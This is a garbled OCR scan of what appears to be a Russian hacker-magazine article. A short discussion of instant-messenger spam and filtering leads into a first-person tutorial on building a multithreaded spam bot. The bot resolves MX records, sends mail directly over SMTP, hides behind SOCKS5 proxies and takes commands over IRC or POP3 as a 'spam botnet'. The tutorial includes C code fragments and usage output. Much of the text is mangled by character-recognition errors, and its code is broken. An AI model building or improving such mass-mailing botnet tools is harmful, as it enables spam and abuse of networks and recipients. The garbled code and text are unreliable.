В ПОСТАВКЕ С ХР, ЭТОТ СЕРВИС ИМЕЕТ 
МАЛО ОБЩЕГО (РАЗВЕ ЧТО 
НАЗОЙЛИВОСТЬ). ЭТО ОДНА ИЗ 
СТАНДАРТНЫХ ВОЗМОЖНОСТЕЙ ВИНДЫ, 
КОТОРАЯ ПОЗВОЛЯЕТ СЕРВЕРАМ 
ОТПРАВЛЯТЬ ОПОВЕЩЕНИЯ 

НА РАБОЧИЕ СТАНЦИИ. ПРИЧЕМ 
ПОЯВЛЯЛИСЬ ТАКИЕ СООБЩЕНИЯ 

В ОБЫЧНЫХ ДИАЛОГОВЫХ ОКНАХ. 

ЭТОТ СПОСОБ РАССЫЛКИ ВСТРЕЧАЕТСЯ 
И СЕЙЧАС. 


ПОМНИТЕ, КАК ДО ВЫХОДА SP2 ПОД WIN- 
DOWS ХР ВЫПРЫГИВАЮЩЕЕ OKOLUKO 
«THE REGISTRY IS CORRUPTED. PLESASE 
VISIT THIS SITE AND DOWNLOAD PATCH» 
ИЛИ «ANNOYED BY THESE MESSAGES? 
VISIT THIS SITE» ДОВОДИЛО ВСЕХ ДО 
БЕЛОГО КОЛЕНЬЯ? ИСПОЛЬЗОВАЛОСЬ 
OHO ДЛЯ ОПОВЕЩЕНИЯ NETBIOS, 

И ОТНЕГО МОЖНО БЫЛО ИЗБАВИТЬСЯ 
ДВУМЯ СПОСОБАМИ: ПЕРЕКРЫТЬ ПОРТЫ 
ОТ 135 ДО 139 И 445 ИЛИ ПРОСТО 
ВЫРУБИТЬ ЭТОТ СЕРВИС ЧЕРЕЗ 
КОНСОЛЬ ОСНАСТКИ. 


среднестатистический алгоритм бота ограничива- 
ется лексическим анализом текста сообщений 
и подбором ответа по словарю фраз. Личные дан- 
ные бота при регистрации тоже подбираются по от- 
дельному словарю. При желании бот может анали- 
зировать личные данные другого пользователя, де- 
лая беседу более персонализированной. А после 
непродолжительного диалога бот выдает какой-ли- 
бо текст, в котором фигурирует ссылка (ради нее 
все затевалось). И обычно на это ведется более 
80-90% респондентов, опять же, благодаря персо- 
нализации и выдумке спамера, который может за- 
ложить в словарь весьма интригующие фразы. Но 
основная трудность спамера и отличная возмож- 
ность для пользователя отфильтровать ботов — от- 
сутствие интеллекта у бота и бедность фантазии са- 
мих спамеров. Чтобы вывести жестянку на чистую 
воду, достаточно одного нестандартного вопроса 
или вопроса с неоднократным повтором. 

Для мыла существует масса методик: созда- 
ние черных списков, фильтрация сообщений на ос- 
нове статистических методов, авторизация почто- 
вых адресов, проверка существования отправите- 
ля и тому подобное. Применить для интернет-мес- 
сенджера можно, пожалуй, только черные списки 
(и то локально) и фильтрацию на основе статисти- 
ческих методов. Со статистикой особо не развер- 
нешься, так как сообщения, рассылаемые через 
мессенджеры, содержат мало текста, и это, в свою 
очередь, крайне затрудняет автоматический ана- 
лиз теми средствами и алгоритмами, которые при- 
меняются для электронной почты. Если же приме- 
HATb «Почтовые» техники определения спама, 
то первые три места в хит-параде спамерских со- 
общений займут сообщения: «Привет!», «Как де- 
ла?» и одиночный смайлик. 

Ограничения по частоте пересылки в мессе- 
нджерах тоже не эффективны, так как активность 
общения по мессенджеру сильно зависит от коли- 
чества свободного времени. А у некоторых — 
от других факторов, основным из которых является 
болтливость :). Соответственно, один и тот же чело- 
век может отправить несколько тысяч сообщений 
в сутки, разговаривая только с друзьями или по ра- 
боте, а может не отправить ни одного. Также не под- 
ходит анализ сообщения по формальным призна- 
кам — из-за небольшого числа доступных клиент- 
ских программ, единой системы авторизации, вы- 
сокой стандартизации и других особенностей реа- 
лизации протоколов формальные признаки практи- 
чески отсутствуют. 


Когда «куришь» спам, сильно не затягивайся 


> — борьба Ha уровне сервера. Из перспективных 
разработок стоит отметить анализ статистики пове- 
дения пользователя: количество ответов, получае- 
мых пользователем на его сообщения, количество 
занесений его в игнор-лист, количество безуспеш- 
ных запросов на авторизацию и других параметров. 
Такое, кстати, уже невозможно в электронной поч- 
те. Хотя бы потому, что IM — синхронный метод об- 
щения, а почта — асинхронный. Далее следует ана- 
лиз сообщения. Основной принцип схож с «почто- 
вым»: строится база «спам-слов», каждому из них 
присваивается вероятность, что оно спамо- 
вое (то есть его «вес»), затем анализируется сооб- 
щение. Если сообщение набирает общий вес, пере- 
валивающий за установленный максимум, то оно 
уходит в топку. Кстати, по таким же соображениям 
работают всевозможные, но немногочисленные су- 
ществующие антиспам-плагины для клиентов IM. 
Но на сервере их эффективность все равно на по- 
рядки выше. 

> борьба на уровне клиента. А что же делать 
клиентам? Если возможно — запретить видимость 
статуса через web и отключить прием сообщений 
от пользователей вне контакт-листа. Либо исполь- 


СПАМ ПРАКТИЧЕСКИ ВЕЗДЕСУЩ. МАЛО ТОГО, ЧТО ОН ПРИХОДИТ 
ПО ЭЛЕКТРОННОЙ ПОЧТЕ, ТАК ЕЩЕ ИМЕЕТ СВОЙСТВО 
«МАТЕРИАЛИЗОВЫВАТЬСЯ» В РЕАЛЬНЫЕ ПОЧТОВЫЕ ЯЩИКИ, 


ОТКУДА ВЫГРЕБАЕТСЯ ОХАПКАМИ 
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зовать автоответчик, который будет переправлять 
пользователю сообщение: «Хочешь пообщаться, — 
вот тебе код, закинь мне его обратно для авториза- 
ции» (код сообщения генерируется самим автоот- 
ветчиком). 

A еще лучше просто не отвечать. Как с «ни- 
щими» в переходе: хочешь, чтобы их не было — 
не давай им ничего. Если так будут делать все про- 
хожие, «нищие» уйдут сами. Прежде чем дать ав- 
торизацию, смотри информацию пользователя. Да- 
лее кидай пробное сообщение, но без особого 
смысла. Если ответ приходит в ту же секунду 
и не по контексту — в игнор. 
> = опечальном. Так что аська (и другие IM) — 
это не только «цветок на могиле рабочего време- 
ни». Спам в инстант-мессенджерах из явления эк- 
зотического постепенно переходит в повседневное. 
Противостояние спамеров и антиспамеров — веч- 
но. Причина этого в одном — простота копирования 
и рассылки электронной информации. И неважно, 
что через эту информацию рассылать. 

Новым витком может стать спит (spit) — неп- 
рошеные сообщения в системах интернет-теле- 
фонии. Низкая стоимость трафика и резко воз- 
росшее за последние несколько лет качество при- 
водят к тому, что все больше людей переходят на 
пакетную передачу голоса. При этом возможнос- 
ти 1Р-телефонии не ограничиваются голосовой 
связью. Уже есть решения, которые могут отсы- 
лать до тысячи голосовых сообщений в минуту, 
производительность зависит от широты использу- 
емых каналов и мощности железа. Вот здесь уж 
точно придется применять кардинально новые 
способы борьбы © 
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> = основные возможности. Сперва необходимо 
четко определить возможности и принцип работы 
программы. Спам-бот имеет два основных файла: 
файл со списком е-мейлов и файл с сообщением, 
которое необходимо рассылать. Каждое сообще- 
ние отправляется на определенный е-мейл в от- 
дельном потоке. Для управления спам-ботом нам 
потребуется небольшой набор команд: добавление 
адреса электронной почты, запуск рассылки сооб- 
щений, остановка всех потоков и выход из програм- 
мы. Для удобства я предлагаю два способа админи- 
стрирования: с помощью специальных команд в IRC 
или POPS. В первом случае программа принимает 
сообщения в приват и обрабатывает их как коман- 
ды, в последнем же случае через определенный ин- 
тервал времени бот должен проверять отдельный 
почтовый ящик и просматривать сообщение на на- 
личие команд. Естественно, должна быть предус- 
мотрена аутентификация: я реализовал аутентифи- 
кацию по одному паролю. Также (для анонимности) 
следует сделать возможной отправку сообщений 
через прокси, например, через SOCKSS. Ну и на- 
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дешевые рассылки 


Пишем спам-бота с управлением через irc и pops 


РАССЫЛКОЙ СООБЩЕНИЙ ПО ЭЛЕКТРОННОЙ ПОЧТЕ ВРУЧНУЮ СЕЙЧАС НЕ ЗАНИМАЕТСЯ НИ 
ОДИН СПАМЕР. ДЛЯ ЭТОГО ИСПОЛЬЗУЮТСЯ ПРОГРАММЫ, КОТОРЫЕ ОБЫЧНО ПИШУТСЯ 

НА ЗАКАЗ И НЕ ДОСТУПНЫ ШИРОКОМУ КРУГУ ЮЗЕРОВ. Я РЕШИЛ СОЗДАТЬ СВОЕГО СПАМ- 
BOTA, УПРАВЛЯЕМОГО С ПОМОЩЬЮ IRC ИЛИ POP3, СПОСОБНОГО РАССЫЛАТЬ СООБЩЕНИЯ 
В МНОГОПОТОЧНОМ РЕЖИМЕ И РАБОТАТЬ ЧЕРЕЗ ПРОКСИ 


4epen (xdiman @ тай.ги) 


последок, должны присутствовать атрибуты любой 
спамерской программы — специальные макросы 
в теле письма, которые при отправке будут автома- 
тически заменены конкретными значениями, как 
то: текущая дата, адрес получателя, адрес отправи- 
теля и так далее. После того, как описаны возмож- 
ности, следует определиться с опциями бота. 

> общие опции спам-бота. Наш спам-бот будет 
иметь несколько обязательных опций: зепаег — 
e-mail адрес отправителя; send_threads_cnt — коли- 
чество потоков для рассылки сообщений; pass- 
word — пароль для управления через IRC или 
РОРЗ; send_emails_file — файл со списком e-mail 
адресов, каждый адрес записан в отдельной стро- 
ке; send_message_file — файл с сообщением для 
отправки; орег — тип администрирования програм- 
мы — 0 (немедленный старт), 1 (управление через 
IRC), 2 (управление через РОР3З). Следующие оп- > 
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WARNING! 
ВСЯ ИНФОРМАЦИЯ ИЗ ЭТОЙ СТАТЬИ ПРИВЕДЕНА ИСКЛЮЧИТЕЛЬНО 
В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ! ИСПОЛЬЗУЯ ЕЕ НА ПРАКТИКЕ, 

ТЫ НАРУШИШЬ ЗАКОН И ПОДВЕРГНЕШЬ СЕБЯ ГЛУБОКОМУ 

; ДИЗРЕСПЕКТУ CO СТОРОНЫ ВСЕХ ИНТЕРНЕТЧИКОВ! 
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ции зависят от типа управления и являются необя- 
зательными в общем случае. 

> = опции управления через IRC. В случае управ- 
ления через IRC для начала необходимо указать 
сервер IRC-cetu и порт. За это отвечают опции 
irc_server и irc_port :). Далее идут специфические 
для IRC параметры — irc_username, irc_nickname 
и irc_channel. Первые два необходимы для регист- 
рации бота в сети, последний — канал, на котором 
бот будет ожидать выполнения команды. Програм- 
ма заходит на канал для удобства отправки команд 
сразу всем ботам в том случае, если у тебя их нес- 
колько. Можно описать еще две опции, которые 
я не встроил в программу, но которые также могут 
быть полезны — пароль на сервер и пароль на ка- 
нал, чтобы никто другой не мог воспользоваться 
твоим спам-ботнетом :). 

> = опции управления через POPS. Идея управле- 
ния ботом через POPS заключается в следующем: 
через определенный интервал спам-бот проверяет 
заданный почтовый ящик на наличие новых писем, 
а в случае обнаружения — считывает тело письма 
и просматривает его на наличие команд. Если ко- 
манды обнаружены и пароль совпадает, бот выпол- 
няет их. После выполнения программа удаляет пись- 
мо. Опции pop_server, pop_username и pop_pass- 
word отвечают за адрес мейл-сервера, логин и па- 
роль соответственно. Для расширения функцио- 
нальности еще можно задавать в опциях интервал 
проверки и порт, но для этого должны быть предус- 
мотрены умолчания. 

> = опции прокси. В случае использования прок- 
си нам потребуются три опции: версия SOCKS- 
протокола, адрес прокси-сервера и порт. Хочу за- 
метить, что заставить почту работать через НТТР 
ргоху несколько проблематично, вследствие этого 
благоразумно отправлять письма через SOCKS4- 
или 5ОСК$5-прокси. В данной статье я опишу 
только протокол ЗОСК$5, но ты с легкостью смо- 
жешь реализовать взаимодействие спам-бота 
uc 4 версией протокола. Для увеличения функци- 
ональности можно передавать опцией не сервер и 
порт, а файл со списком прокси, записанный в ви- 
де proxy:port. 

> получение «длинных» опций. Обычно, после 
описания опций программы я приступаю к созда- 
нию либо парсера конфигурационного файла, либо 
парсера опций командной строки. В данном случае 
мы поступим вторым образом, а именно — будем 
использовать замечательную функцию getopt_long, 
позволяющую парсить «длинные опции». Прототип 
этой функции описан в файле getopt.h и имеет сле- 
дующий вид: 


Первые две опции мы передаем из функции 
main() — это агдс и argv, количество аргументов 
и сами аргументы командной строки соответствен- 


ГУ 
2 Закр» 


$ Пожилые н te me NOs tamer Led 
> 


aot (SERENE O eRe at 


© Tocanee carmen ¢ ssheemme rune ll w Salles 
© весла corgameu ь ADU 
© аазамаы co eae кл [С 


© Гуляя binehonee 
$ Заза а crams 
® Cranes ое а 191 

© О4иж! эчазнв 
СИЕ Ape bee мда кет} 


© Youmriert ripen забанят 
® Curptuss вар счержазия зоба в 


Большое количество информации по реализации потоков можно найти на OpenNet 


но. Следующую опцию мы пока пропустим, а я рас- 
скажу о предпоследнем параметре. Как ты уже за- 
метил, этот параметр структурного типа struct 
option. Этот тип описан там же, в getopt.h, и имеет 
следующий формат: 


Поясню каждый элемент структуры. Первый эле- 
мент — const char* name — это сама «длинная» оп- 
ция. Напомню, «длинные» опции, принимающие 
параметр, в командной строке указываются следу- 
ющим образом: --parameter[=arg], а короткие — -р 
arg. Мы же должны описать массив типа данной 
структуры и первым элементом указать требуе- 
мую «длинную» опцию. Опции, помимо явного за- 
дания какого-либо параметра, могут включать- 
выключать какой-либо режим, например опция 
verbose включает режим подробного вывода сооб- 
щений в лог и не принимает аргумента. Чтобы оп- 
ределить, принимает опция аргумент или нет, пре- 
дусмотрен следующий элемент структуры — 
has_arg. Он может принимать следующие значе- 
ния — no_argument (опция не принимает аргу- 
мент), required_argument (аргумент обязателен), 
optional_argument (аргумент необязателен). Эле- 
мент Над — переменная для записи результата ра- 
боты функции. Если она равна NULL, функция 
возвращает значение с помощью оператора return. 
И, наконец, последний элемент: в нашем случае 
это символ для «короткого» задания опции. Те- 
перь самое время создать массив типа данной 


структуры и заполнить его нужными значениями 
для обработки всех опций. И еще один важдый мо- 
мент — в последнем элементе массива все эле- 
менты структуры должны равняться нулю или 
NULL. Теперь настало время рассказать про тре- 
TUN аргумент функции getopt_long. Это строка, сос- 
тавленная из символов — коротких опций и двое- 
точий. Если после опции идет ее аргумент, то пос- 
ле этого символа ставится двоеточие, в противном 
случае — идет символ следующей короткой опции. 
Последний аргумент — option_index — нам He при- 
годится, о его назначении можешь прочитать, вве- 
дя man getopt. Функция getopt_long будет возвра- 
щать один из символов — коротких опций или -1 
в случае завершения парсинга командной строки. 
Для удобства обработки рекомендуется использо- 
вать оператор switch. Еще один важный момент — 
указатель на считанный аргумент для обработан- 
ной опции содержится в переменной optarg, аесли 
обнаружена неизвестная опция, то функция возв- 
ращает знак вопроса. После обработки опций по- 
добным образом обязательно должна быть про- 
верка, определяющая, входят ли заданные цело- 
численные значения в определенный интервал, 
заданы ли значения для необходимых опций ит.д. 
На этом обработку опций можно завершить, и пе- 
реходить к дальнейшей разработке. 

> реализация многопоточности. Для ускорения 
работы я решил сделать наш спам-бот многопоточ- 
ным. Для этого существует несколько решений. 
Первое из них — создавать потоки с помощью fork(). 
В данном случае дочерний поток является незави- 
симым процессом, продолжающим работать даже 
после завершения родителя. Память в таком случае 
не разделяется, что затрудняет сбор результатов от 
всех потоков. Для межпроцессного взаимодействия 
используется функция pipe(), но я считаю данный 
способ неподходящим к нашей задаче. Следующий 


способ, опробованный мной — системный вызов 
clone() с параметром CLONE_VM. Этот параметр от- 
вечает за разделение памяти между родительским 
процессом и потомком, за исключением того, что не- 
обходимо самому выделить пространство для стека 
потока. Этот способ весьма удобен, но у меня по ка- 
кой-то странной причине память не хотела разде- 
ляться, и я предпочел другой вариант :). Другой ва- 
риант, который рекомендуют использовать в боль- 
шинстве многопоточных программ — это POSIX 
Threads. Это набор своеобразных функций-враппе- 
ров, скрывающих от тебя низкоуровневую реализа- 
цию свызовом Clone(). В нашем случае для удобства 
работы я определил для всех потоков структуру 
thread_info, имеющую следующий вид: 


struct thread_info 
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int status; /* thread statuae */) 
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char *msg; /* message */ 
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struct thread_info threads [MAX_THREADS] ; 


(* all threads */ 


Bi-om элементе массива threads содержится инфор- 
Mauna для 1-го потока. Расскажу подробнее об эле- 
ментах данной структуры. Первый элемент — id — 


Для удобства сборки создадим Makefile 


Распределение заданий 


это номер текущего потока, в следующий — 
result — помечается результат выполнения. О наз- 
начении элемента status можно догадаться — 
он обозначает статус потока, THREAD_RUNNING 
или THREAD_STOPPED. Элемент thread — своеоб- 
разный рЁйгеад-дескриптор данного потока, а сле- 
дующие элементы содержат задание, выполняемое 
потоком — адрес электронной почты, адрес мейл- 
сервера, адрес отправителя и само сообщение. 
В следующем фрагменте кода показано распреде- 
ление заданий между потоками: 


Распределение заданий между потоками 
for (i=0;i<send_threads_cnt;it+t+) 
{ 
if(i == send_threads_cnt — 1 && 
threads [i] .status!=THREAD_STOPPED) 
{i= 0 оон ) 
if(threads[i].status 
continue; 
free_thread_info(i); 
bzero(threads[i].email, 


!= THREAD_STOPPED) 


AO) 
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fgets(threads[i].email, 20, fp); 
if (!stremp(threads[i].email, "")) 
break; 
threads[i].host = 
mx_query (threads[i] .email) ; 
if(!threads[i].-host) continue; 
asprintf(&(threads[i].msg), "%s", 


message); 
asprintf(&(threads[i].sender), 
sender) ; 


песн 
GS 


threads[i].status = THREAD_RUNNING; 
pthread_create(&(threads[i].thread) , 
NULL, send_email, &threads[i]); 
} 


В данном цикле мы ищем те потоки, которые изме- 
нили свой статус на THREAD_STOPPED. Когда най- 
ден один такой поток, происходит освобождение па- 
мяти, занятой информацией о задании, и заполне- 
ние структуры новым заданием. Из файла считыва- 
ется новый адрес электронной почты, определяет- 
ся IP-agpec почтового сервера, записываются сооб- 
щение и адрес отправителя. После этого поток по- 
мечается как THREAD_RUNNING, и с помощью 
функции pthread_create происходит создание HOBO- 
го потока. Первый аргумент этой функции — струк- 
тура-дескриптор потока, следующая — атрибу- 
ты (необязательна), далее — функция, которая бу- 
дет исполняться в потоке, и, наконец, аргумент этой 
функции — мы передаем относящийся к данному 
потоку элемент массива threads. Поток в данном 
случае зависим от родителя, пока не вызвана функ- 
ция pthread_detach, и ожидать его завершения все 
же лучше функцией pthread_join. После того, 
как считаются все адреса электронной почты, будет 
вызвана как раз эта функция для ожидания завер- 
шения работы всех потоков, чей статус не равен 
THREAD_RUNNING. Функция pthread_join имеет 
два аргумента — дескриптор потока и переменную, 
в которую будет записан результат возврата функ- 
ции, работающей в потоке. 

Следующая проблема на пути реализации 
многопоточного приложения — синхронизация. Де- 
ло втом, что в случае считывания или попытки изме- 
нения одной и той же области памяти разными пото- 
ками может возникнуть ошибка или могут быть запи- 
саны неправильные данные. Для этого в библиотеке 
POSIX Threads имеется специальный способ — мью- 
тексы. Использование мьютексов дает гарантию, что 
данный код исполняется в единственном потоке и 
позволяет избежать подобных ошибок. Мьютексы 
имеют тип — pthread_mutex_t, и для работы с ними 
предусмотрено несколько функций: pthread_mutex_- 
init — инициализация, pthread_mutex_lock — блоки- 
рование, pthread_mutex_unlock — разблокирование, 
pthread_mutex_destroy — уничтожение мьютекса. 
При изменении глобальных переменных в потоке ре- 
комендуется использовать данный метод. А сейчас 
перейдем к следующей части — определение IP-an- 
реса тай-сервера. 
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> DNS MX Query. Естественно, что трюк с отсе- 
канием части e-mail'a после «собаки» и использова- 
нием данного адреса в качестве мейл-сервера не 
пройдет, равно как и не пройдет использование 
официального ЗМТР-сервера для отправки писем 
легальными клиентами. Для спама нам нужен ад- 
рес, который используется для пересылки писем 
между мейл-серверами. Данный адрес хранится 
в записи МХ в DNS. Очевидно, что стандартные 
функции gethostbyname и gethostbyaddr не могут 
быть использованы по двум причинам: они считы- 
вают только записи типов АиРТЬ, и, ктому же, они 
имеют проблемы с работой в многопоточных прило- 
жениях. Для нашей задачи необходимо альтерна- 
тивное решение — использование библиотеки 
resolver. Данная библиотека позволяет делать лю- 
бые ОМ№$-запросы, и, к тому же, не имеет проблем 
в работе с потоками. Нам предлагаются следующие 
функции: 


Расскажу о них подробнее. Первые две функции де- 
лают запрос к ОМ$-серверу заданного класса ити- 
па для имени host, и возвращают результат 
в answer. Их отличие состоит в том, что res_search 
обрабатывает опции, которые содержатся в эле- 
менте options структуры _гез, определенной в фай- 
ле arpa/nameser.h. Последняя функция «расширя- 
ет» сжатое имя и помещает результат в область па- 
мяти, указанную buffer. Чтобы сделать ОМ$-запрос 
для записи МХ, нам необходимо указать C_IN в ка- 
честве класса и Т_МХ в качестве типа записи. Да- 
лее, с помощью dn_expand мы можем выделить 
значения МХ-записей (к слову, их может быть нес- 
колько). В спам-боте я сделал основную функцию, 
которая считывает все записи, и оберточную, кото- 
рая возвращает первую запись. 

>» — протокол SMTP. Вот и подошли мы к самой от- 
ветственной части — отсылке сообщений по прото- 
колу SMTP. После подключения к мейл-серверу 
спам-бот должен сообщить свой адрес с помощью 
команды EHLO: 


| 


Далее мы дожидаемся ответа. Если первым в отве- 
те идет число 250, значит, все нормально и можно 
переходить к следующей части. Хочу обратить вни- 
мание на то, что все команды, отправляемые серве- 


ру и приходящие от сервера, должны оканчиваться 
символами \r\n, или CR LF. Следующая команда 
указывает отправителя: МАШ FROM:<sender@- 
sender.ru>. После получения положительного отве- 
та указываем получателя: ВСРТ ТО:<гесемег@ - 
receiver.ru>. И, в конечном счете, команда DATA 
разрешает ввод данных. Следует заметить, что вво- 
димое в дальнейшем сообщение завершает пара 
CR LF. Для завершения работы после отсылки со- 
общения используем команду QUIT, после чего 
можно разорвать соединение. 

Опять же, для повышения быстродействия 
порекомендую тебе группировать адреса электрон- 
ной почты по мейл-сервера и отправлять письма 
на несколько адресов в одном потоке. 
> управление спам-ботом. Первое, что необхо- 
димо реализовать в управлении спам-ботом, будь 
то управление через POP3 или IRC — это аутенти- 
фикация. Для простоты аутентифицироваться мож- 
но по одному паролю. Все команды, отправляемые 
спам-боту, имеют вид: password:command[:argu- 
ment]. Пароль задается опцией командной строки 
при старте программы, а команды я решил сделать 
следующие: add добавляет адрес электронной поч- 
ты в базу данных путем простого дописывания в ко- 
нец файла, $ай запускает спам-бот на выполнение, 
a exit завершает работу программы. Для выделения 
отдельных частей в команде я применил замеча- 
тельную функцию Strtok(). Она имеет два аргумен- 
та — исходную строку и разделитель — и возвра- 
щает часть строки до разделителя. Если мы хотим 
получить часть строки от первого до второго разде- 
лителя, нам следует вызвать функцию повторно, но 


c NULL в качестве первого аргумента. Если же дос- 
тигнут конец строки, функция strtok() возвращает 
NULL. Процедура admin() в моем спам-боте отвеча- 
ет как раз за обработку команд. Специфические 
функции start_irc и start_pop с учетом взаимодей- 
ствия со своим протоколом выделяют команды 
и передают их в процедуру admin(), которая работа- 
ет так: первая часть до разделителя — символа 
двоеточия — сравнивается с паролем, в случае не- 
совпадения происходит выход из процедуры; часть 
от первого двоеточия до второго или до конца стро- 
ки сравнивается с существующими командами — 
в случае Start выполняется процедура start(), в слу- 
чае exit происходит выход из программы функцией 
exit(0), в случае add открывается файл со списком 
е-мейлов, считывается третий аргумент и добавля- 
ется в файл. В случае несовпадения ни с одной 
из перечисленных команд функция возвращает 0, 
в противном случае — 1. Естественно, при включен- 
ной опции уефозе все изменения журналируются. 
Расширить функциональность ты можешь добавле- 
нием команд для изменения рассылаемого сообще- 
ния, для получения лога работы спам-бота, для ос- 
тановки всех потоков без выхода из программы 
и так далее. 

+> управление с помощью IRC. Управление че- 
рез IRC очень удобно, особенно в том случае, ес- 
ли у тебя не один спам-бот, а целый ботнет :). Мож- 
но отправлять команды всему ботнету одновре- 
менно, вдобавок к этому IRC имеет большую, по 
сравнению с РОРЗ, скорость работы. Для защиты 
ботнета, как я уже говорил, можно ставить пароль 
на сервер или на канал. Но минусом является пол- 


ss. #gpanbot —hels 


namesnick) [--irc_veername-user) 


ms Se 

-): ~-sender=ema 

-с, —serd_threada_cnt <<» reads 
—@, —-send_arails_fileefile 

“g, ~~send_message_file=file 

-С, ~-log_file-file Log file. 
“Vy verbose 

-м, ~"pessword=pass 


п; Fi rc_nicknanesnick 
--irc_usernana=-user 


help 
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Usage: ./spaevot —00ег=011|? —-звпбегтейя:|1 —send_thireads_crt=num —send emai le filers 

ile --send_message_file=file [--log_filesfile] [--verbose] Lj pesewor see} {—irc_nick 
[—irc_channel=tchan] [—irc_server=nost] 

ort) [—pop_merversnost] [--pop_usernaresuser) (--pop_pasmeardepass) 

Type of administrating spambat. 

ри ao 00211 for sender: 

count, 
File with the list of emails. 
File with mail neseage. 


Enable verbose побе. 

Password for sdainistrating spembot. 
Nickname in the IRC network. 
Usernare in 


Address of FURS. server. 
Login on POPS server. 
Password on POPS server, 
Display this message, 


=k, —-iec_ohennel=tchan Channel in 

“8, ~-irc_server=nost Address of 

р. ~-ire_partsport Fort ef IRC server, 
+t, —pop_servershcet 

“cd, --pop_usernanesuser 

TT, ~"POR_Psssworu=pass 


—ire-port=p| 


IRC network. 
ТАС network. 
IRE server. 


Хорошо оформленный вывод изаде() облегчит пользование ботом 


pearhot taser 3 
pambot: pases; 
eeho! : рав 


Управление через POPS 


ная контролируемость сети 1ВС-опами, которым, 
как ни странно, бывает не все равно, что творится 
у них в сети. Короче говоря, приступим к реализа- 
ции взаимодействия с протоколом, используя ВЕС 
1459. Если сервер у нас запаролен, то первой ко- 
мандой будет команда PASS (напоминаю: в конце 
каждой команды здесь, по аналогии с SMTP, ста- 
вится \r\n): 


После этой довольно-таки незамысловатой аутен- 
тификации мы посылаем серверу nickname наше- 
го спам-бота: 


Затем отправляем команду USER, которая имеет 
следующий формат — USER <изетате> <host- 
name> <servername> :<realname>. Параметры host- 
name и servername должны быть проигнорированы 
сервером и не имеют для нас никакого значения. 
Символ двоеточия перед realname означает, 
что в realname могут содержаться пробелы, но зна- 
чение данного параметра также не принципиально. 
В принципе, подключение к серверу на этом завер- 
шено. Далее нам следует обработать два типа со- 
общений, приходящих от сервера. В случае неак- 
тивности клиента сервер периодически отправляет 
ему сообщения вида PING :<text>. Наша задача — 
ответить серверу командной PONG стой же стро- 
кой. Для этого во всех входящих сообщениях с по- 
мощью Strtok() выделяем первую часть до пробела, 
сравниваем ее с PING и отправляем серверу 
PONG :). Если же команда РОМС не приходит, сер- 
вер автоматически отключает клиента. Следующий 
тип команд — сообщения от других клиентов, при- 
ходящих на канал или присылаемых в приват боту. 


Из них-то мы и должны выделить команду, которая 
пойдет на вход функции admin(). Первым в таких со- 
общениях идет имя пользователя с предваряющим 
двоеточием, а за ним — команда и ее параметры: 
МСК, в случае, если пользователь сменил ник, 
PRIVMSG — если пользователь отправил сообще- 
ние итак далее. Вот его-то нам и нужно обработать. 
После PRIVMSG идет имя пользователя или канал, 
на который отправлено сообщение, и уж затем, CHO- 
ва с двоеточием в начале, идет само сообщение. 
Обрабатывается все это также функцией strtok, 
нужно только не забывать проверять ее результат 
на NULL, чтобы не вызвать ошибку сегментации. 
На этом я завершаю описание данного протокола. 
Добавлю только, что для выхода используется ко- 
манда QUIT :<message>. 

+> управление через POPS. Идея управления че- 
рез РОРЗ основана на следующем: через заданный 
интервал проверяется указанный почтовый ящик, 
считывается количество писем, считывается послед- 
нее письмо и из него выделяются необходимые ко- 
манды, причем команд в одном письме может быть 
несколько. Авторизация в IRC очень проста — она 
делается двумя командами USER user и PASS pass, 
которые, как обычно, заканчиваются символами \r\n. 
Ответы сервера всегда начинаются со строки +ОК 
или -ERR, что означает успешное выполнение ко- 
манды или ошибку соответственно. Следующим ша- 
гом будет получение количества сообщений. Это де- 
лается командой STAT без параметров, и в резуль- 
тате сервер возвращает +ОК, а через пробел коли- 
чество сообщений и размер сообщений в октетах. 
Количество сообщений мы запоминаем как номер 
последнего сообщения и получаем его командой 
RETR М, где М — номер сообщения. Хочу заметить, 
что в конце сообщения стоит точка в одной строке. 
Далее стоит решить, где передавать команды. Пере- 
давать команды в теме письма неудобно, так как она 
кодируется особым алгоритмом большинством кли- 
ентов при отправке. Я реализовал это следующим 
образом — в письмо добавляются строчки вида 
spambot:command, что позволяет выделить команду 
при помощи все того же strtok. После обработки 
письма удалим его — DELE <номер письма> и завер- 
шим работу командой QUIT. Все — теперь можно 
ждать какое-то время функцией sleep() и повторять 
вышеуказанные команды заново. 

> — взаимодействие с ЗОСК$5Б-прокси. Прокси 
типа ЗОСК$ очень удобен. Нам достаточно подклю- 
читься, обменяться некоторыми начальными дан- 
ными и работать так же, как и напрямую с серве- 


ИДЕЯ УПРАВЛЕНИЯ ЧЕРЕЗ POP3 ОСНОВАНА НА СЛЕДУЮЩЕМ: 

ЧЕРЕЗ ЗАДАННЫЙ ИНТЕРВАЛ ПРОВЕРЯЕТСЯ УКАЗАННЫЙ ПОЧТОВЫЙ 
ЯЩИК, СЧИТЫВАЕТСЯ КОЛИЧЕСТВО ПИСЕМ, СЧИТЫВАЕТСЯ ПОСЛЕД- 
НЕЕ ПИСЬМО И ИЗ НЕГО ВЫДЕЛЯЮТСЯ НЕОБХОДИМЫЕ КОМАНДЫ 


ром. Для начала пошлем прокси буфер изтрех бай- 
тов. Первый байт содержит цифру 5 — версию про- 
токола, следующий байт — единицу (длину опций), 
и последний — 0, как опция, указывающая на отсу- 
тствие авторизации. После этого получаем двух- 
байтовый ответ и анализируем второй байт: если он 
не равен нулю, произошла ошибка, и мы выходим 
из процедуры. Далее отправляем десятибайтовую 
команду. Первый байт(5) — версия протокола, вто- 
рой байт определяет команду — в нашем слу- 
чае 1 (connect). Следующий байт зарезервирован, 
имы оставляем его равным нулю, а в идущие затем 
четыре байта копируем IP-agpec. Ну и, наконец, 
в последние два байта запишем порт, соответствен- 
но Ои 25. Далее получаем 10-байтовый ответ и ана- 
логично анализируем второй байт. Если он равен 
нулю, то подключение установлено, и можно начи- 
нать рассылку спама. Данная возможность отсут- 
ствует в программе — предлагаю тебе реализовать 
ее самому. 

> макросы в теле письма. Наиболее часто ис- 
пользуемые макросы в теле письма — это адрес 
отправителя, адрес получателя и текущая дата. 
Обозначим их следующим образом — %sender, 
%гесемег и 3te. При передаче сообщения в поток 
для отправки его необходимо преобразовать, заме- 
нив данные макросы на реальные значения. Приве- 
ду фрагмент кода, делающего эту работу: 


Количество макросов очень легко расширяемо, 
и втакой реализации нет ничего сложного. Можно 
результат расширять динамически с помощью real- 
loc(). Данную возможность я предоставлю тебе ре- 
ализовать самому. 

> = заключение. Результатом моей работы яви- 
лась небольшая программа, предназначенная для 
массовой рассылки сообщений. Она обладает мно- 
